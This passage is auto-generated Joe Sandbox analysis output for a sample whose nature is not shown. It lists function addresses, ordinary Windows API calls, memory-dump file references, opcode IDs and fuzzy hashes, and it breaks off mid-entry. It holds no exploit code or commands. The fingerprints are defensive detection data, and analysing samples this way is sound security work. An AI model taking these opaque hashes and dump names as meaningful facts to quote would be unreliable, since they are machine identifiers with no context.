                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2169056816-0
                                                                                                                    • Opcode ID: 0dca34ce3ac4d5f29c3d48f5643c25c5f5fc5f828786891985a671b319e2d7bd
                                                                                                                    • Instruction ID: f275f8f5445c2904c777f8c3a882acbafd514f0ffe6e298b537beb6fcc3ea39f
                                                                                                                    • Opcode Fuzzy Hash: 0dca34ce3ac4d5f29c3d48f5643c25c5f5fc5f828786891985a671b319e2d7bd
                                                                                                                    • Instruction Fuzzy Hash: D1015E3A140308AED7109F75EC45F9B77B8EF09750F505022FA09B7290D3B0AA288BA5
                                                                                                                    Function 00E36C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00E36DDF,00000000,00000400), ref: 00E36C74
                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E36C95
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: ace451a068d04ec6d0ebdcc41621a827a0a3836e4a1a87b59ef00080f60033ed
                                                                                                                    • Instruction ID: d990d9f8c534de6aeea769f7114556dfb7b4f96235316557aafa6b82fddceddd
                                                                                                                    • Opcode Fuzzy Hash: ace451a068d04ec6d0ebdcc41621a827a0a3836e4a1a87b59ef00080f60033ed
                                                                                                                    • Instruction Fuzzy Hash: 11D09E31244300BEEA510A729D0AF5B6B59AB45B91F14D404B655B40E0C6B49428E629
                                                                                                                    Function 00E619F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E619EF,?,?,00000008,?,?,00E6168F,00000000), ref: 00E61C21
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3997070919-0
                                                                                                                    • Opcode ID: bf8d46fa45ef6cbf64280017d41dc3964287e33f4b644954567adc64692a6969
                                                                                                                    • Instruction ID: c99990024616c625b031431562c574928c59935a6e30a58d4fd5afec375b59ec
                                                                                                                    • Opcode Fuzzy Hash: bf8d46fa45ef6cbf64280017d41dc3964287e33f4b644954567adc64692a6969
                                                                                                                    • Instruction Fuzzy Hash: 94B18231250608DFD71ACF28D486BA57BE0FF453A8F299698E899DF2A1C335DD91CB40
                                                                                                                    Function 00E4F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E4F66A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2325560087-0
                                                                                                                    • Opcode ID: 5185cb3e79494bd8d70741f138b38aabb3d61699149f8a7ff54a03ced2bfc82c
                                                                                                                    • Instruction ID: 1343d5ad8d8721c5d99302f50b696e36f6b6cc4497bcc802bcde961f5693855d
                                                                                                                    • Opcode Fuzzy Hash: 5185cb3e79494bd8d70741f138b38aabb3d61699149f8a7ff54a03ced2bfc82c
                                                                                                                    • Instruction Fuzzy Hash: A95190719106058FEB18CF99E9857AAB7F0FB48758F25986BD401FB350D374A904CB90
                                                                                                                    Function 00E3B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00E3B16B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Version
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889659487-0
                                                                                                                    • Opcode ID: bca806e03f2c08ae5d1bc7d5e9296843f99dd2628aa02d4e58102ad5dbcb5bda
                                                                                                                    • Instruction ID: c13956d5529f2b3badf9c3ae9e653cba5bb368c1b8a36d6aa728d484979d2892
                                                                                                                    • Opcode Fuzzy Hash: bca806e03f2c08ae5d1bc7d5e9296843f99dd2628aa02d4e58102ad5dbcb5bda
                                                                                                                    • Instruction Fuzzy Hash: 68F01DB4E002088FDB18CB19EC966D677B1E748355F104295D61AA3390D3B0ADC8CE60
                                                                                                                    Function 00E340FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: gj
                                                                                                                    • API String ID: 0-4203073231
                                                                                                                    • Opcode ID: 71dded86239e84d2d0552ef89f77b3b0b5d80f0c05f9cc096cc05dfc09e74b84
                                                                                                                    • Instruction ID: ba6ec6ff6f5481320e98d58548d44a4b98d51ef819c6e2f2cc99dcac337461ab
                                                                                                                    • Opcode Fuzzy Hash: 71dded86239e84d2d0552ef89f77b3b0b5d80f0c05f9cc096cc05dfc09e74b84
                                                                                                                    • Instruction Fuzzy Hash: 42C139769183418FC354CF69D84065AFBE2BFC8308F15892EE998D7311D734EA45CB96
                                                                                                                    Function 00E4F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00E4F3A5), ref: 00E4F9DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 73fcaafa7065e9645d8e5a4b28d261c249fde95a4400f029df55d097b6d999ce
                                                                                                                    • Instruction ID: 928540c9689e3e5fce0b244e224d60d357147a0e18750d9e48018c133f027616
                                                                                                                    • Opcode Fuzzy Hash: 73fcaafa7065e9645d8e5a4b28d261c249fde95a4400f029df55d097b6d999ce
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Function 00E5C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 54951025-0
                                                                                                                    • Opcode ID: de77a9e2e23fdc2508b6277d0e0834adfdd63261bd26dfffe74de099960ef510
                                                                                                                    • Instruction ID: f512ea40ef2f0323cfb920a6d108c0941b50e4a2f3120330938f3df183633390
                                                                                                                    • Opcode Fuzzy Hash: de77a9e2e23fdc2508b6277d0e0834adfdd63261bd26dfffe74de099960ef510
                                                                                                                    • Instruction Fuzzy Hash: C6A01130202200AF8B008F32AE0820A3AAAAB022C0308002BA208E00A0EA2080A8AA00
                                                                                                                    Function 00E462CA Relevance: .8, Instructions: 829COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction ID: 34f631343a6075681da3014631d2fe6e12b38d497d5e1fb71676f1a96c1c26b5
                                                                                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction Fuzzy Hash: AA62F9716047849FCB29CF28D4906B9BBE1FF96304F08996ED8DA9B342D734E945CB12
                                                                                                                    Function 00E477EF Relevance: .8, Instructions: 817COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction ID: fc2c42ff375e1a5f03a88ed0459d0649306f3a03b7305da44779ce68d787f07d
                                                                                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction Fuzzy Hash: C362E3716083858FCB19CF28D8809B9BBE1FF99304F08996DE8DA9B346D730E945CB55
                                                                                                                    Function 00E3F461 Relevance: .7, Instructions: 694COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction ID: 8dadf02e9425a433324dd61ea760fbc3d3bd1dd5357e33f908e0c6c86d7770d4
                                                                                                                    • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction Fuzzy Hash: B0523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                    Function 00E47153 Relevance: .5, Instructions: 536COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8073b1f4d4717f5268015c1c0cc392ee6c5132c6265ca16c57fda0e01a9f9195
                                                                                                                    • Instruction ID: 946297b2ae8f178447401e0d9cc4a0724871ba837ddc131ae2e400ba5a2f47b4
                                                                                                                    • Opcode Fuzzy Hash: 8073b1f4d4717f5268015c1c0cc392ee6c5132c6265ca16c57fda0e01a9f9195
                                                                                                                    • Instruction Fuzzy Hash: 5A12D2B16187068FC728CF28D494AB9B7E1FF94308F14992EE9D6D7780D334A994CB85
                                                                                                                    Function 00E3C426 Relevance: .5, Instructions: 454COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 71350d6e34447bef22ff7382f68c23d1952503ac5683cb4df51389adf0693ee6
                                                                                                                    • Instruction ID: e3428ce6a22243e2807b0b6aa226a476ea98358175a4c8d5ad09039bfd6951b9
                                                                                                                    • Opcode Fuzzy Hash: 71350d6e34447bef22ff7382f68c23d1952503ac5683cb4df51389adf0693ee6
                                                                                                                    • Instruction Fuzzy Hash: 7BF1AB71A083018FC718CF28C58866ABFE5EFCA718F256A2EF5C5B7251D631E945CB42
                                                                                                                    Function 00E46CDC Relevance: .3, Instructions: 343COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 4a926af1be7af2c6d30b285b7186f90e17bbdf871c6a822640b31cc33ac1db12
                                                                                                                    • Instruction ID: 1f3f6d948594346012b0101557c5cf06c687ed8afe968a8be907b83964427a17
                                                                                                                    • Opcode Fuzzy Hash: 4a926af1be7af2c6d30b285b7186f90e17bbdf871c6a822640b31cc33ac1db12
                                                                                                                    • Instruction Fuzzy Hash: E3D1B6B1A083418FDB14DF28D84475BBBE1BF89308F04556DE8C9AB342D774EA09CB96
                                                                                                                    Function 00E3E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7c7d390785a611dbcd73124dd5acfb0f083dd190b94c3ed53bab2e71b3371a6c
                                                                                                                    • Instruction ID: 53a30440557a14c2aa8841af9eda268e9c7c5c12511db0e8fd08ee26741ba517
                                                                                                                    • Opcode Fuzzy Hash: 7c7d390785a611dbcd73124dd5acfb0f083dd190b94c3ed53bab2e71b3371a6c
                                                                                                                    • Instruction Fuzzy Hash: 54E16D755083948FC304CF6AD89046ABFF0AF9A304F45095EF9C8A7392C235EA59DF92
                                                                                                                    Function 00E44088 Relevance: .3, Instructions: 270COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction ID: dc4a5f478311b5be0d498af945f4c487615510c2d6e224237ff3a4c9269185a4
                                                                                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction Fuzzy Hash: 039157F03003458BDB28EF64F899BFA77D5EBA0304F14192DF596A72C2DA749585C352
                                                                                                                    Function 00E443BF Relevance: .2, Instructions: 243COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction ID: 6758c05c035104a8090d4ed34f469f7b99b8ff21456e875526b6258564d40e49
